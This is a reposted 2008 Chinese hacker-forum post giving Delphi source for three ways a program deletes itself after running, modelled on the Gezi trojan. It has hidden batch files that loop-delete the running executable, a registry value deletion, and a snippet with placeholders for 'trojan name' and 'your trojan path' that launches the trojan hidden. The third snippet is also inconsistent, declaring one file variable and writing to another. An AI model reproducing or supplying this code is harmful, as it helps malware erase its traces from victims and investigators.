[转帖] 模仿鸽子实现自删除

fengchen

四年级

Rank: 4

帖子: 2077
精华: 0
威望: 0 度
金币: 3887 枚
性别: 男
最后登录: 2008-8-26

1^# 大中小发表于 2008-5-24 13:04 只看该作者

模仿鸽子实现自删除

现在很多程序全部都有自删除的功能,那他们是怎么实现的呢?

文章来源: 破晓技术论坛
作者:king

方法一:

unit zishan;

interface
uses
windows;
procedure killme;
implementation
function DeleteFile(const FileName: string): Boolean;
begin
{$IFDEF MSWINDOWS}
  Result := Windows.DeleteFile(PChar(FileName));
{$ENDIF}
{$IFDEF LINUX}
  Result := unlink(PChar(FileName)) <> -1;
{$ENDIF}
end;

function OpenKey123(Root:HKEY;StrPath:pchar):Hkey;
var TempKey:Hkey;
begin
TempKey:=0;
RegOpenKeyEx(Root,StrPath,0,KEY_ALL_ACCESS,TempKey);
Result:=TempKey;
end;

procedure DelValue(Root:HKEY;StrPath:pchar;StrValue:pchar);
var s:Hkey;
begin
s:=OpenKey123(Root,StrPath);
RegDeleteValue(s,StrValue);
RegCloseKey(s);
end;

function Gesy :string;
var sysdir:array [0..255] of char;
begin
  GetsystemDirectory(sysdir,255);
  Result :=sysdir;
  if copy(Result,length(Result),1)<>'\' then
  Result:=Result+'\';
end;
function FileSetAttr(const FileName: string; Attr: Integer): Integer;
begin
  Result := 0;
  if not SetFileAttributes(PChar(FileName), Attr) then
Result := GetLastError;
end;

//自删除
procedure killme;
var
  F: textfile;
  BatchFileName: string;
  ProcessInfo: TProcessInformation;
  StartUpInfo: TStartupInfo;
begin
  DelValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp', 'NoRealMode');
  BatchFileName := Gesy + 'Deleteme.bat';
  AssignFile(F, BatchFileName);
  Rewrite(F);
  WriteLn(F, ':try');
  WriteLn(F, 'del "' + ParamStr(0) + '"');
  WriteLn(F, 'if exist "' + ParamStr(0) + '"' + ' goto try');
  WriteLn(F, 'del %0');
  CloseFile(F);
  FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);
  StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
  StartUpInfo.wShowWindow := SW_HIDE;
  if CreateProcess(nil, PChar(BatchFileName), nil, nil, False, IDLE_PRIORITY_CLASS, nil, nil, StartUpInfo, ProcessInfo) then
  begin
CloseHandle(ProcessInfo.hThread);
CloseHandle(ProcessInfo.hProcess);
  end;
end;
end.

方法二:
//超快速
WinExec(Pchar('cmd /c erase /F ' + GetCommandLine),0);
ExitProcess(0);

方法三:
var del:textfile;
begin
assignfile(t,'del.bat');
  rewrite(del);
writeln(t,'del 木马名');
writeln(t,'del %0');
closefile(del);
winexec(pchar('你的木马地址'),sw_hide);
end;

那啥..一般自删除最常用的是第三种

My Blog，欢迎来访

TOP

‹‹ 上一主题 | 下一主题 ››

Processed in 0.017691 second(s), 5 queries, Gzip enabled.